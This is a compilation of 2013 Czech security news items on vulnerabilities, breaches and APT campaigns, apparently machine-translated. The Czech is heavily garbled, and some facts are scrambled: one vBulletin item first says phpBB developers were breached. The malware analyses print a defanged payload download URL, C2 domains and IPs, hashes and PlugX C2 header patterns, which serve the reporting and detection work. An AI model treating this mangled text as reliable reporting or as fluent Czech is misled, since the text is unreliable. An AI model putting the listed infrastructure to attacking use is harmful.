Backdoors v hardwaru, jako je síťové zařízení jsou obvykle pro účely vzdálené správy. Výzkumník Travis Goodspeed řekl Heffner, že tento trojan je určitým binárním používá ve firmwaru umožňuje správci použít tento konkrétní řetězec, aby se automaticky překonfigurovat nastavení zařízení.

"Můj odhad je, že vývojáři si uvědomili, že některé programy / služby potřebné, aby bylo možné automaticky měnit nastavení zařízení, uvědomil si, že webový server již má k dispozici všechny kód změnit toto nastavení, se rozhodli, že stačí poslat žádost na webový server, kdykoliv oni potřebovali něco změnit, "napsal Heffner. "Jediný problém byl, že webový server vyžaduje uživatelské jméno a heslo, které koncový uživatel mohl změnit."


Telefony Nexus jsou zranitelné vůči útokům DoS

1.12.2013 Zranitelnosti | Mobil
Útočníci mohou telefon od Googlu přinutit k restartu nebo jej odpojit od mobilního internetu posláním velkého množství speciálních SMS.

Na možný problém upozornil Bogdan Alecu, který pracuje jako správce systému v nizozemské společnosti Levi9. V ohrožení jsou podle něj uživatelé smartphonů Galaxy Nexus, Nexus 5 a Nexus 6.

Problém je ve způsobu, jakým telefony Nexus zacházejí se speciálním typem textových zpráv Class 0 SMS, někdy také označovaným jako Flash SMS. Taková zpráva se po obdržení okamžitě zobrazí na displeji zařízení uživatele, ale automaticky se do něj neukládá. Sám uživatel rozhodne, co se se zprávou stane.

V zařízeních Nexus se tento typ zprávy zobrazí nad všemi aktivními okny a je obklopen částečně průhledným černým pozadím. Pokud uživatel se zprávou nic neudělá, případná další zpráva stejného typu se opět zobrazí na přední pozici.

Na obdržení zprávy není uživatel upozorněn žádným zvukovým signálem a nelze to změnit. Uživatel o nich tedy prakticky neví, dokud se nepodívá na displej.

Alecu zjistil, že již po obdržení 30 Flash SMS v řadě se Nexus začíná chovat neobvyklým způsobem. Nejčastější variantou je prý restart zařízení. Pokud se pak zařízení znovu uvede do provozu a po zapnutí je vyžadováno zadání PIN, uživatel je odpojen od internetového připojení až do doby, než si toho sám všimne. Stejně tak nemůže přijímat žádné hovory ani běžné SMS.

V menším procentu případů může podle Alecua dojít k odpojení od internetového připojení i bez nutnosti restartu. Tomu se však nakonec uživatel také nevyhne, protože pro obnovení připojení musí telefon vypnout a zapnout.

Alecu prý na možnost DoS útoku přišel již před rokem a od té doby testoval jeho proveditelnost na různých zařízeních Nexus s různými verzemi systému Android. Problém se podle něj týká jen Androidu 4.x – včetně nejnovějšího Androidu 4.4 KitKat.

Podrobeno testu bylo rovněž 20 zařízení od jiných výrobců, ovšem zde se zranitelnost vůči DoS nepotvrdila. To neznamená, že jiné telefony také nejsou ohroženy. Pouze se to zatím nepodařilo potvrdit.

Google se již problémem zabývá, přesto se však Alecu zpočátku nesetkal s přílišným pochopením. Společnost prý kontaktoval již několikrát a vždy se mu dostalo automatické odpovědi.

V červenci se pak Alecuovi ozval někdo z bezpečnostního týmu Androidu a slíbil zahrnutí opravy do Androidu 4.3. To se však nestalo, proto se Alecu rozhodl vše zveřejnit.

Oficiání oprava zatím není k dispozici, uživatelé Nexusů zatím mohou použít aplikaci Class0Firewall, na jejímž vývoji se Alecu podílel.


Debianu Patche Díry v Nginx, Perl modul
23.11.2013 Zranitelnosti
Debian vydala záplaty na pár bezpečnostních chyb ve volném operačním systému, včetně zabezpečení bypass chyby ve webovém serveru Nginx. Další chyba je v modulu Perl používané v systému.

Chyba zabezpečení v protokolu HTTP :: Tělové Perl modulu by mohlo útočníkovi umožnit spuštění libovolného příkazu na zranitelné serveru poskytujícího Debian.

"HTTP tělo multipart parser vytváří dočasné soubory, které zachovávají příponu z nahraného souboru. Útočník schopni nahrát soubory do služby, která používá HTTP :: Karoserie :: Vícedílné by mohly spouštět příkazy na serveru, pokud tato dočasná názvy souborů se používá v následujících příkazech bez dalších kontrol. Tato aktualizace omezuje možné přípony používané pro vytvořených dočasných souborů, " poradní Debian říká.

Druhá chyba je chyba ve webovém serveru Nginx, který umožňuje útočníkovi obejít omezení zabezpečení v Debianu. Nalezeno Ivan Fratric bezpečnostní Google týmu, zranitelnost je vážná. Je to "by mohlo umožnit útočníkovi obejít omezení zabezpečení pomocí speciálně vytvořeného požadavku," řekl Debian v jeho poradenství.

Uživatelé se systémem zranitelné verze Debianu se doporučuje upgradovat co nejdříve.


Podrobnosti o záplatované Google Account Recovery Bug Odhalené
23.11.2013 Zranitelnosti
Poslední sada záplat Google zahrnovala opravu pro vážné Gmail obnovení účtu zranitelnosti, které byly zveřejněny podrobnosti, které.

Výzkumník Oren Hafifi Izraele poukazuje ve svém sdělení, že uvolnění heslo Google otevírá dveře k mnohem více, než e-mail, zvyšování riziko.

"Už jste někdy zastavit a zeptat se, co dělá Gmail stát? Je to globální Hlavní autentizace a identifikace knihovna. Vážně, pokud někdo má přístup k vašemu účtu Gmail, může "heslo obnovit" svou cestu do jiných webových / mobilních aplikací tam, "napsal Hafifi na svém blogu .

Hafifi kombinovaná cross-site scripting, žádost o cross-site padělání a průtoku obejít heslo, aby dokázaly tento hack.

Útok začíná s falešnou Google phishing e-mailu zaslaného na uživatele služby Gmail. Hafifi vysvětluje krvavé detaily ve svém blogu o spletité, proč se jeho útok funguje, ale v podstatě phishing e-mail musí být přizpůsoben s e-mailovou adresou oběti v URL.

Odkaz, nicméně, by měl odkazovat tak na útočníkův web, kde je požadována žádost padělání cross-site (CSRF). Další skriptování útok cross-site spustí a uživatel je prezentována s možností resetu falešné heslo.

"Uživatel klepne na tlačítko" Obnovit heslo "a odtud, nebe je limit," napsal Hafifi.

Jakmile se uživatel pokusí resetovat své heslo a získat zpět svůj účet, útočník je v pozadí přijímající nové informace, hesla a soubory cookie.

Hafifi řekl Google oprava zranitelnosti ve lhůtě 10 dnů, a že je v souladu obdržet chybu odměnu a další Síň slávy uznání od společnosti Google.


Python 3.3.3 opravuje několik bezpečnostních chyb

20.11.2013 Zranitelnosti

Python 3.3.3 opravuje několik bezpečnostních a hodně celkových oprav chyb nalezených v Pythonu 3.3.2. Tato verze plně podporuje OS X 10.9 Mavericks. Zejména tato verze opravuje problém, který by mohl způsobit předchozí verze Pythonu k selhání při psaní v interaktivním režimu na Mac OS X 10.9.

Python 3.3 obsahuje celou řadu vylepšení 3.x série, stejně jako usnadnit portování 2.xa 3.x. mezi
PEP 380, syntax pro přenesení do subgenerator (výtěžek)
PEP 393, flexibilní řetězec reprezentace (skoncování s rozlišením mezi "široký" a "úzké" Unicode sestavení)
AC implementace "desítkové" modulu až 120x zrychlení na desetinné náročné aplikace
Systém dovozu (__import__) je založena na výchozím nastavení importlib
Nový "lzma" modul s LZMA / XZ podpory
PEP 397, Python launcher pro Windows
PEP 405, virtuální prostředí podpora v jádře
PEP 420, namespace Balíček podpory
PEP 3151, přepracování OS a IO výjimka hierarchie
PEP 3155, kvalifikovaný název třídy a funkce
PEP 409, potlačení výjimka kontext
PEP 414, explicitní Unicode literály pomoci s přenesením
PEP 418, rozšířila nezávislé na platformě hodiny v "time" modulu
PEP 412, nový klíč sdílení slovník implementace, která výrazně šetří paměť pro objektově orientovaného kódu
PEP 362, funkce, podpis objekt
Nový "faulthandler" modul, který vám pomůže diagnostikovat pády
Nový "unittest.mock" modul
Nový "ipaddress" Modul
"Sys.implementation" atribut
Politický rámec pro e-mailový balíček s prozatímním (viz PEP 411) politika, která dodává tolik lepší podporu Unicode pro analýzy záhlaví e-mail
"Collections.ChainMap" třída pro propojení mapování na jednu jednotku
Obaly pro mnoho dalších funkcí POSIX v "systému" a "signál" moduly, jakož i další užitečné funkce, jako je "sendfile ()"
Hash randomizace, který byl zaveden v dřívějších verzích Oprava chyby, je nyní ve výchozím nastavení zapnuta.


Google rozšiřuje Patch Program odměn
20.11.2013 Zranitelnosti

Společnost Google oznámila rozšíření svého nedávno představila program Patch Reward, který vyzývá bezpečnostní výzkumníci předložit záplaty pro třetí strany open source softwaru má zásadní význam pro zdraví celého internetu. Zpočátku program zahrnoval základní služby infrastruktury sítě, jako je OpenSSH, BIND, ISC DHCP, image analyzátory jako libjpeg libjpeg-turbo, libpng, giflib, open-source základy Google Chrome (chromu, Blink), s velkým dopadem knihoven jako OpenSSL a zlib a zabezpečení kritických komponent linuxového jádra (včetně . Kernel-based Virtual Machine) Nyní je seznam projektů způsobilých pro odměny zahrnuje i Android open source projekt, webové servery, jako je Apache httpd, lighttpd, Nginx; pošty doručování Sendmail, Postfix, Exim, a Dovecot; OpenVPN; univerzita Delaware NTPD, další základní knihovny:. Mozilla NSS, libxml2 a toolchain vylepšení zabezpečení pro GCC, binutils a LLVM Stejně jako dříve se vědci vyzvány, aby předložily kódu vylepšení a opravy, aby správci jednotlivých programů přímo, a po předložení je součástí V softwaru je kód, může být předložen k pozornosti Google a odměnou panel bude rozhodovat o výši na odměnu (obvykle mezi $ 500 až $ 3,133.7). Reaktivní skvrny, které se zabývají jediný, který byl dříve objevenou chybu nebudou mít nárok na odměnu. "Přemýšleli jsme, prostě Odstartoval OSS bug-lovecký program, ale tento přístup může vymstít. Kromě platných zpráv o chybách prémií pozvat značné množství rušivého provozu - stačí zcela přemoci malou komunitu dobrovolníků. Na vrcholu tohoto, kterým se problém často vyžaduje více úsilí, než najít to, "vysvětlil Google bezpečnost člen týmu Michal Zalewski. "Takže jsme se rozhodli vyzkoušet něco nového: poskytnout finanční pobídky pro dolů-na-zemi, proaktivní vylepšení, které přesahují rámec pouhé kterým se známou bezpečnostní chybu. Ať už chcete přejít na bezpečnější alokátoru, přidat oddělení výsady, uklidit spoustu povrchní volání strcat (), nebo i jen k tomu, aby ASLR - chceme pomoci! "


Netflixers Pozor: Rybář Exploit Kit Cíle Silverlight zabezpečení

19.11.2013 Zranitelnosti | Bezpečnost

Vývojáři stojící za Kit rybář Exploit zjevně přidal nový exploit během minulého týdne, která využívá známou chybu zabezpečení v prohlížeči Microsoft Silverlight rámce.

Silverlight, podobně jako Adobe Flash, Microsoft je plug-in pro streamování médií na prohlížečích a je možná nejvíce známý pro použití v streaming Netflix v videoslužby.

chris_wakelin

Britové-based zabezpečení výzkumník Chris Wakelin objevil Silverlight využít minulý týden zaslali o tom na Twitter prostřednictvím svého @ EKWatcher rukojeti. Odtud nezávislý bezpečnostní výzkumník, že jde o název Kafeine zvedl ji, vyšetřoval Rybář EK a popsal svá zjištění na svém blogu Malware nepotřebují kávu .

Podle Kafeine exploit kit obvykle kontroluje, zda je systém nasazen na to má Java nebo Flash, ale nyní mohou zkontrolovat, zda je Silverlight nainstalován. Pokud nelze využít Java nebo Flash přináší dálkové ovládání exploit ( CVE-2013-0074 ), který se zaměřuje Silverlight 5. Zranitelnost byla oprava března , ale uživatelé se systémem Silverlight, kteří dosud oprava kritické zranitelnosti jsou stále v ohrožení a bude nejlépe aktualizovat jejich software.

Rybář EK povrch minulý měsíc po zatčení z Blackhole Exploit Kit stvořitele břichem v Rusku. Podle Kafeine, stejný tým za další nadupané cool Exploit Kit , kteří měli vazby na Blackhole, pomohl vyvinout Angler a zároveň stojí i za populární ransomware Reveton.

Netflix má 40 milionů předplatitelů globální, které by mohly být citlivé na zneužití, protože služba především používá Silverlight pro streaming médií. Video streaming firma dělají pokroky příkopu Silverlight pro HTML5 v posledních několika měsících, a zároveň představila HTML5 podporu Windows 8.1 a Internet Explorer 11 přes léto, je tato technologie není zcela dotvořena ještě na většině prohlížečů.


vBulletin.com hacknutý, hackeři snaží prodat informací na 0-day použít

19.11.2013 Zranitelnosti | Hacking

Vývojáři populárního softwaru internetové fórum phpBB již oznámil v noci na pátek, že jejich síť byla napadena a úspěšně porušení, a že zúčastněné hackeři přístup zákazníků ID a zašifrovaná hesla na svých systémů. Společnost reagovala okamžitě resetování hesla všech uživatelů a žádá, aby si zvolili novou, komplexní, že nebude používat na jiných stránkách, ale nesdílí další podrobnosti o tom, jak hack stalo. ale další skupina. Hacker skupina Inj3ct0r Team přihlásila k odpovědnosti za hack na své stránce na Facebooku, a oni mají také tvrdil, že ti, kteří porušili MacRumors fóra a tak pravděpodobně odešel s databází obsahující hesla svých registrovaných uživatelů 860000. MacRumors vlastníkem webu Arnold Kim řekl, že přístup používaný útočníků byl ten stejný používal ohrozit Ubuntu fóra zpět v červenci: podařilo dostat své ruce na účet pověřovacích listin moderátor a byli schopni stupňovat svá práva, aby se přístup k heslu databáze. To musí být ještě potvrzena, jak se jim podařilo dostat moderátora pověření účtu na prvním místě, ale pokud Inj3ct0r Team tvrzení mají být věřil, využili z zero-day zranitelnosti kritické ovlivňující verze 4.xx a 5. х.x na vBulletinu. "Máme nahrát shell v serveru vBulletin, stáhněte si databázi a dostal kořen," oni psali . "Chtěli jsme dokázat, že nic v tomto světě není bezpečné." Zdá se, že se stejná chyba byla použita k porušení MacRumors. Ubuntu fóra také běžel na vBulletinu. Existence této zranitelnosti je ještě nepotvrzená společností, ale můžete si být jisti, že pracují zuřivě ji objevit (pokud je k dispozici). hacker tým je zřejmě otevřeně prodávají informace o tom, . a možná oprava pro chybu zabezpečení v otázce Do té doby, tam jsou některé, které zřejmě věří Inj3ct0r tým tvrzení - nebo alespoň nejsou ochotni ohrozit své uživatele. Defcon fóra byly zakázány až do rozlišení zranitelnosti, a bude zpět, když patch je venku a je nainstalován. UPDATE: Wayne Lukáš vBulletin Technická podpora Lead, který oznámil , že se analyzují důkazy poskytnuté týmu Inject0r a že nevěří, že hackeři odkryli 0-day zranitelnost v vBulletin. "Tyto hackeři byli schopni ohrozit nezabezpečeného systému, který byl použit pro testování vBulletin mobilní aplikace. Nejlepší obranou proti možnému kompromisu je, aby váš systém běží na Nejmodernější náplast verze softwaru, "dodal.


vBulletin Zero Day zneužita k útoku Populární fóra
18.11.2013 Zranitelnosti

Hacker skupina nazývající se Inj3ct0r bere odpovědnost za kompromis více než 860.000 hesel na MacRumors.com stejně jako samostatný útok na vBulletin.com, tvůrci softwaru vBulletin pohánět celou řadu vysoce postavených fórech, včetně MacRumors a fórech Ubuntu .

Inj3ct0r tým vyslán na své stránce na Facebooku, že napadli tři stránky a našel kritickou zero-day zranitelnost na všech verzích vBulletin 4.xx a 5.xx

"Máme nahrát shell v serveru vBulletin, stáhněte si databázi a dostal kořen," říká pošta.

VBulletin technická podpora vedoucí Wayne Luke hlášeno porušení koncem minulého týdne v poradenství, nutit vBulletin uživatelům měnit svá hesla stejně.

"Velmi nedávno, náš bezpečnostní tým zjistil, sofistikované útoky na naši síť, nezákonného přístupu k informacím fóru uživatel, případně včetně svého hesla" Luke napsal. "Naše vyšetřování v současné době ukazuje, že útočníci přístup zákazníků ID a zašifrovaná hesla v našem systému. Přijali jsme bezpečnostní opatření resetování hesla k účtu. "

Mezitím, Black Hat a DEF CON zakladatel Jeff Moss vyslán na Twitter, že DEF CON fóra byla dočasně uzavřena. Inj3ct0r také tvrdí, že použil stejný zero-day zranitelnost v vBulletinu infiltrovat DEF CON fórum.

"Jdeš pozdě, jsme se záložní servery, které se starají o vás taky. LOL, "Inj3ct0r vyslán na Facebook dnes ráno.

Inj3ct0r tvrdí, spustit databázi využije a zranitelnosti [www [.] 1337 dny [.] Com a působí jako zdroj pro výzkumníky a bezpečnostních profesionálů.

"1.337den tým se specializuje výhradně na bug výzkumu, nikoli svévolným zásahům," stojí na webu.

Inj3ct0r rovněž přihlásila k odpovědnosti za hack fóra MacRumors a použít zero-day získat moderátora heslo a ukrást hesla databáze.

Hackeři vyslán na fóru MacRumors krátce po útoku, který by dojít k prosakování údaje o heslu. Redakční ředitel Arnold Kim potvrdil legitimitu poštou na Threatpost minulý týden, hackeři zaslali část hash hesla Kim a sůl jako důkaz.

Kim rychle upozorněni uživatelům porušení a také on radil svým členům změnit svá hesla, a to nejen na tomto fóru, ale všude tam, kde by použili stejné heslo.

"Nejdeme na" úniku "cokoliv. Neexistuje žádný důvod, proč pro nás. Neexistuje žádná legrace v tom, že. Nevěřte nám, pokud nechcete, my upřímně vůbec nezajímá, "napsal hacker. "Nejsme" hmotnost popraskání "hodnoty hash. Neznamená to však trvat dlouho vůbec spustit hash přes hashcat s několika slovníků a solí, a získat výsledky. "

Ve stejné funkce minulý týden hacker naznačil také, že verze 3.xx na vBulletinu byla bezpečnější než novějších verzích a že vina by neměl dát na zastaralé vBulletin software.

Útok na volném Linuxové distribuce Ubuntu v červenci ovlivněn blízkosti 2000000 svých členů fóra účtu, zatímco oni byli schopni přistupovat každý uživatel e-mailovou adresu a hash hesla.

"Zvažte" škodlivý "útok přátelský," Inj3ct0r říkal MacRumors útoku. "Situace mohla být katastrofálně horší, kdyby nějaký věhlas pohonu idiot byl viník a databáze měla být unikly na veřejnost."


Podpora Windows XP končí, jaké jsou možnosti?

16.11.2013 Zranitelnosti | Zabezpečení
Jak zvládnout přechod na otevřenou platformu, pokud již nechcete dále používat operační systém od Microsoftu?

8. dubna příštího roku definitivně skončí technická podpora pro operační systém Windows XP. Společně s tím skončí také distribuce jakýchkoliv aktualizací včetně bezpečnostních oprav.

Více než 12 let starý systém však stále běží na velkém počtu firemních počítačů a firmy tak nyní stojí před důležitou otázkou, kam dál.

Možností přitom moc nemají. Buď provedou přechod na novější verzi Windows, nebo si vyberou některou z volně dostupných linuxových alternativ. V obou případech přitom budou muset vyřešit problém s kompatibilitou kritických aplikací.

Jak postupovat v případě, že se rozhodnete pro open source? Dave Lane, ředitel novozélandské Open Source Society, nabízí tři možná řešení.

Wine
„Tento software nelze vinit z příliš malých ambicí. Jeho autoři vytvořili prostředí, díky kterému si aplikace původně napsané pro Windows myslí, že běží ve Windows, ačkoliv ve skutečnosti jsou nainstalované a spuštěné v Linuxu,“ říká Lane.

I po 15 letech se vývojářům Wine daří reagovat na všechny změny ve Windows a replikovat je do jiného prostředí s neuvěřitelnou přesností. Není divu, že se Wine již dávno stal pevnou součástí některých linuxových distribucí.

Prostřednictvím Wine sice nelze spustit všechny aplikace pro Windows, ale většinu ano. Dokonce i v případě, že svoji aplikaci nenajdete v seznamu podporovaných programů, je velká šance, že si s ní Wine nějak poradí.

Windows Virtual Machine
Pokud si Wine s vaší aplikací neporadí, nezoufejte. Další možností, jak ji přestěhovat na open source, představuje XP Virtual Machine. Vše, co potřebujete, je VirtualBox od Oraclu a instalační CD Windows XP.

Na virtuálním stroji spolehlivě spustíte všechny své aplikace. Jedinou výjimkou jsou programy, které ke své funkci potřebují specifický hardware.

Otázku zabezpečení pak vyřešíte tím, že XP umístíte do sandboxu. Navíc lze virtuální stroj nastavit tak, aby nikdy nebyl v přímém spojení s vnějším světem.

Vzdálená plocha
Třetí možnost řeší již zmíněný problém s virtuálním spouštěním aplikací závislých na konkrétním hardwaru.

V praxi použití vzdáleného přístupu znamená, že na současném hardwaru poběží i nadále Windows XP, ovšem prostřednictvím síťového nastavení bude systém odříznut od okolního světa a tedy i potenciálních bezpečnostních hrozeb. Bude pouze spojen v rámci intranetu se serverem, ve kterém bude spouštět všechny programy.


Spěch pro CVE-2013-3906 - horké zboží

16.11.2013 Zranitelnosti

Před dvěma dny FireEye hlásil , že nedávná CVE-2013-3906 Exploit začal být používán nových hrozeb herce jiný než ty původní. Nové infikované dokumenty sdílet podobnosti s dříve zjištěnými využije, ale měly jiný náklad. Tentokrát tyto exploity jsou využívána k doručování Taidoor a PlugX backdoor, podle FireEye.

Na Kaspersky Lab jsme také zjistil, že další APT skupina právě začala šíření škodlivých dokumenty MS Word využívající CVE-2013-3.906. Toto APT herec je skupina Winnti, které podrobně popsány zde . Poslali spear-phishing e-maily s připojeným dokumentu, který obsahuje exploit. Jako obvykle se Winnti pachatelé se snaží použít tuto techniku ​​dodávat první fázi malware - PlugX.

Jsme se dozvěděli o útoku proti jedné herní společnosti, která neustále prochází útoky ze skupiny Winnti. Dokument MS Word, který obsahuje exploit ukazuje stejný TIFF "obraz" - 7dd89c99ed7cec0ebc4afa8cd010f1f1 - které spouští zneužití této chyby zabezpečení, jako v Hangover útoků. Je-li využívání úspěšné, je backdoor PlugX jejím stažení ze vzdálené adresy URL:
hxxp :/ / 211.78.90.113/music/cover/as/update.exe .

Podle hlavičky PE, byl tento vzorek PlugX sestaven na 04.11.2013 . Vnitřní funkční PlugX Dynamic Link Library, která je dešifrovat a zařazeny do paměti při spuštění škodlivého kódu je trochu starší - to se datuje od 30.října 2013 . V rámci svých vývojových větví, verze PlugX, který je ke stažení je mírně odlišný od konvenčního PlugX ale stejný typ, který objevil FireEye když malware posílá CNC HTTP POST pakety s nápadnými přídavných hlaviček:

FireEye vzorek

POST / <random [0-9A-F]{24}> HTTP/1.1
Accept: * / *
FZLK1: 0
FZLK2: 0
FZLK3: 61456
FZLK4: 1
Winnti je varianta

POST / <random [0-9A-F]{24}> HTTP/1.1
Accept: * / *
HHV1: 0
HHV2: 0
HHV3: 61456
HHV4: 1
Winnti je PlugX se připojuje k nové, dříve neznámé C2, av4.microsoftsp3.com . Tato doména ukazuje na IP-adresu 163.43.32.4 . Ostatní Winnti související domény upozorňují již zde začíná 03.10.2013:

ad.msnupdate.bz ap.msnupdate.bz
book.playncs.com data.msftncsl.com ns3.oprea.biz
Opět jsme svědky rychlého rozšiřování využití nově objevené zranitelnosti u různých APT aktérů. Vzhledem k vysoké úrovni soutěže, jsme již viděli, jak rychle nové exploity jsou přidány do různých Exploit Pack když zapojit zločinci. Není zatím jasné, jak se nové APT herci přišli do vlastnictví CVE-2013-3906 - možná, že získal stejný "stavitel" jako Hangover útočníků, nebo získány jen několik ukázek otrávených dokumentů MS Word, a přizpůsobit je pro vlastní potřeby. Mimochodem, můžeme konstatovat, že stejně jako pravidelné zločinci pod konkurenčnímu tlaku, APT herci taky nebude usnout na vavřínech, ale snažit se neustále vyvíjí, zdokonaluje své každodenní procesy a úžeji spolupracovat stává stále nebezpečnější hrozba.

Zjištěná vzorky

Exploit.MSOffice.CVE-2013-3906.a
MS Word dokument: Questionnaire.docx, 63ffbe83dccc954f6a9ee4a2a6a93058

Backdoor.Win32.Gulpix.tu
PlugX backdoor: Update.exe 4dd49174d6bc559105383bdf8bf0e234

Backdoor.Win32.Gulpix.tt
PlugX interní knihovna: 6982f0125b4f28a0add2038edc5f038a


VMware Patche Privilege Chyba v Workstation
16.11.2013 Zranitelnosti | Bezpečnost

VMware dnes oznámila, že oprava a zvýšení úrovně oprávnění zabezpečení v VMware Workstation .

Workstation je software hypervisor připojení více virtuálních strojů na hostitelském hardware. Kompromisy hypervisor by útočník dálkové ovládání přes strojů počet hostů, riziko je zvláště v prostředí zvýšené hosting nebo poskytovatele služeb.

Tato zranitelnost je omezena na Linuxové verzi VMware Workstation, před verzí 9.0.3.

VMware rovněž oprava VMware Player pro Linux před verzí 5.0.3.

Zranitelnost, VMware řečeno, je sdílená knihovna zvýšení úrovně oprávnění chybu. Oba Workstation a Player obsahují stejnou chybu, která by mohla umožnit místnímu útočníkovi eskalovat privilegia celou cestu na root na hostitelském operačním systému.

VMplayer je dodáván spolu s pracovní stanice obraz OS bez nutnosti dalšího hardwaru.

"Tato chyba zabezpečení neumožňuje eskalaci práv z hostujícího operačního systému na hostitele nebo naopak," řekl poradenství.

Jen asi před měsícem, VMware oprava většinu svého sortimentu, kterým ověřování obchvat a denial-of-service chyb v vCenter Server, vCenter Server Appliance, vSphere Update Manager, ESX a ESXi.

Nejzávažnější chyba byla v vCenter Server 5.0 a 5.1, které by mohly útočníkovi umožnit obejít nutnost platného pověření za určitých okolností. Aby zranitelnosti být zneužitelné, musí postižený produkt nasazen v prostředí služby Active Directory, VMware řekl.


CVE-2013-3906: další 0-day Microsoft Office

16.11.2013 Zranitelnosti

Dne 5. listopadu, Microsoft oznámil objev nové zranitelnosti CVE-2013 - 3906, které mohou být využity při zpracování TIFF. Tím zneužití této chyby zabezpečení je možné napadnout software - včetně Microsoft Office a Lync - který používá zranitelnou DLL pro zpracování snímků ve formátu TIFF. Ve stejný den, tam byly zprávy, že Microsoft zaznamenané útoky, které využívají CVE-2013-3.906.

Několik vzorků malwaru byly k dispozici pro nás, že využití CVE-2013-3906. Analyzovali jsme je v detailu. Všechny z nich využívají hromadu postřik, nahrávání jejich kód na adresu 0x08080808 a spustit kód z tohoto umístění. Výjimka generace a paměť přepsat se provádí v ohrožené ogl.dll.
Fragment provedení shell kódu WinDbg

Využije, které jsme měli přístup k mohou být rozděleny do dvou skupin v závislosti na použité shellcodes v nich.

Využije v první skupině používat primitivní a nešifrované shell kód, jehož jediným úkolem je stáhnout a spustit škodlivý software.

Shell kód z exploit v první skupině

Užitečné zatížení klesne čistý. Doc soubor, který se zobrazí na rozptýlit jakékoliv podezření, že uživatel může mít, stejně jako škodlivý program, který byl dříve spatřen v Hangover útoku. To je trojan, napsaný v C + + a který není ani šifrována.
Fragment obsahu čisté. Souboru DOCX

Využije v druhé skupině jsou mnohem propracovanější. Například proto, že shell kód, které používají již šifrována pomocí standardní XOR. Po dešifrování se ukázalo, že není-li stáhnout a spustit škodlivý kód, na rozdíl od většiny činů, včetně těch, které v první skupině cílení CVE-2013 až 3906.

Dešifrovat shell kód z exploit z druhé skupiny

Tam je OLE2 objekt začleněn do původního dokumentu DOCX,. Tento objekt číst v shell kódu. Obsahuje datový proud, který se skládá z 6 bytů se nachází před šifrovaných dat, který obsahuje původní dešifrovací klíč, dynamický dešifrovací klíč, a délku dešifrované datového toku. Dešifrovací algoritmus je standardní XOR s klíčem upraveným byte operace ADD.

Fragment jízdních dat a záhlaví (v červeném rámečku) obsahující klíče a velikost

Po dešifrování tato data transformuje do knihovny DLL s názvem al, který je načten do procesu Winword.exe. Tato knihovna klesne a.exe který je backdoor Citadel.

Fragment rozbalená vzorku Citadel

To znamená, že již existují dvě skupiny zločinců, kteří tam používají novou chybu zabezpečení.

Je zajímavé, že soubory TIFF ve druhé kategorii využije z března 2013, ale jsme zaznamenali první výskyt těchto činů na 31. července. Oni používali úložiště, šifrování a užitečného spuštění postupu popsaného výše. Ale skutečný náklad liší v dřívějších činů. V nových vzorků je dynamická knihovna klesl což poklesne a spustí spustitelný soubor a čisté. DOCX. V dřívějších vzorků DLL je jiný a to klesne jiný čistý. Souboru DOCX a VBE skript. Stejný vbe skript se používá v cross-platformní malware Janicab .

Fragment poklesla. Docx ze vzorku červencovém exploitu

Zdá se, že buď ti samí lidé byli zodpovědní za rozšíření Citadela Janicab - od exploitu do užitečného zatížení - nebo někdo prodává služby šíření škodlivého softwaru, které využívají 0-day využije.

Od okamžiku, kdy se objeví takové hrdinské činy, naše Rozšířené Exploit Prevention (AEP) technologie chrání uživatele před spuštěním škodlivého kódu aplikacemi, které byly napadeny využije zaměřené CVE-2013 až 3906. Tím, že reaguje na anomálie v chování oblíbených app procesů, AEP umožňuje blokovat zahájení využije.

Tyto exploity jsou detekovány statické podpisů Exploit.Win32.CVE-2013-3906.a.


Nový IE 0-day aktivně využívány čínskými útočníky

15.11.2013 Zranitelnosti

Poté, co objevil nový IE zero-day exploit aktivně používá ve volné přírodě, FireEye vědci zjištěno, že zavlažování díra útok je více než pravděpodobné, montuje stejným čínské hackerské skupiny, která zorganizoval operaci DeputyDog a útok na Bit9 . "exploit využívá nový informační úniku zranitelnost IE a out-of-bounds memory access zranitelnosti k dosažení spuštění kódu, "oni vysvětlil v blogu v pátek. Obě chyby jsou zřetězeno dodat správné ROP řetěz potřebné ohrozit konkrétní verzi IE, že uživatel, který navštíví stránky a spustí ohrožena exploit využívá. "přístup do paměti chyba je určen pro práci v systému Windows XP s IE 7 a 8, a na Windows 7," sdíleli. "Využít se zaměřuje na anglickou verzi aplikace Internet Explorer, ale věříme, že zneužití lze snadno změnit k ovlivňování jiných jazyků. Na základě naší analýzy, tato chyba zabezpečení se týká IE 7, 8, 9 a 10 ". "zavlažování díra" webu, který je hostitelem exploit se sídlem v USA a oblíbenou zastávkou pro návštěvníky se zájmem o národní a mezinárodní bezpečnost, říkají vědci , ale oni si jen vzpomenete. Návštěvníci, jejichž prohlížeč byl vystaven exploitu měl Remote Access Trojan (RAT) klesl na svých počítačích. "Tento náklad byl identifikován jako varianta Trojan.APT.9002 (aka Hydraq / McRAT varianta) a běží pouze v interní paměti. To nepíše se na disk, takže malý k žádné artefakty, které mohou být použity k identifikaci infikovaných koncových bodů, "se zdůraznil . "Konkrétně se jedná o užitečné zatížení je kód shellu, který je dekódován a přímo vstřikován do paměti po úspěšném využití přes sérii kroků." Tento "diskless" RAT není trvalá - jednoduchý restart odstraní ze systému. Jeho použití je, že vědci se domnívají, že útočníci jsou buď jistý, že oběti navštíví stejné místo velmi často a následně nakazit znovu, nebo že i krátký časový rámec bude stačit pro útočníků získat přístup k jiným systémům v rámci organizace pohybem do stran. Podle vědců, C & C infrastrukturu použitou v této kampaně je stejný používal v DeputyDog kampani. Také Bit9 poukázal na to, že Hydraq / McRAT Trojan byl rovněž použit při útoku, který zamířil své sítě, stejně jako v Operation Aurora zpět v roce 2010. "S využitím strategické webové kompromisů spolu s in-paměť taktiky balíků dodacích a více vnořené metody mlžení, tato kampaň se ukázala být mimořádně dokonalý a nepolapitelný. APT herci jsou jasně učí a používají novou taktiku, "výzkumníci k závěru, s tím, že očekávají, že hacker skupina nadále uvádět na trh nové kampaně v dohledné budoucnosti. Zatímco tento útok je velmi cílené a omezené a, uživatelé by měli být vědomi toho, že útok lze zmírnit Emet Microsoft.


Microsoft listopadu Patch aktualizace řeší jeden ze dvou známých Zero dní

13.11.2013 Zranitelnosti

Microsoft dnes vydala osm bulletiny zabývající 19 zvláštní zranitelnost ve svém operačním systému Windows, webového prohlížeče Internet Explorer, Office a dalších produktů.

Microsoft vydal tři bulletinů nejvyšší "kritické" hodnocení, zatímco zbývajících pět obdržel druhou nejvíce těžkou "důležitou" rating. Jedním z kriticky hodnocených bulletinů řeší Internet Explorer zero-day zranitelnosti , které útočníci zneužít ke spuštění zalévání děr útoky proti nejmenované americké společnosti nevládní organizace.

